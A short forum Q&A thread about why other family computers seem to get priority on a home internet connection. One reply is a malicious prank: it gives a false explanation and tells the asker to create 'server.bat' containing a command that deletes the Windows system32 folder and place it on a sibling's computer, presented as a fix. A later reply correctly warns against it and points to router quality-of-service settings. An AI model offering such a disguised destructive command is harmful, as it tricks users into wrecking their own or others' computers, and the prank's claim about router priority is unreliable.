How do my families computers take priority over the internet connection?

probably due to the face your computer was installed last in the system, this means your router will allways prioritize other computers but not yours, however you can fix this, first go onto your bro's laptop/pc and make a text document type:

@echo off del c:\WINDOWS\system32

save the file as server.bat
or save it as a text document and rename it server.bat

Umm I wouldn't execute any commands that; first, turns echo off; second, deletes anything \Windows\System32. Best to call him the idiot he is and move along.

Bandwidth scheduling is a 'quality of service' feature that most, or cheap i.e., don't have. Check that router's admin page. It's more likely the bandwidth required vs the bandwidth you got vs the bandwidth you're trying to use.
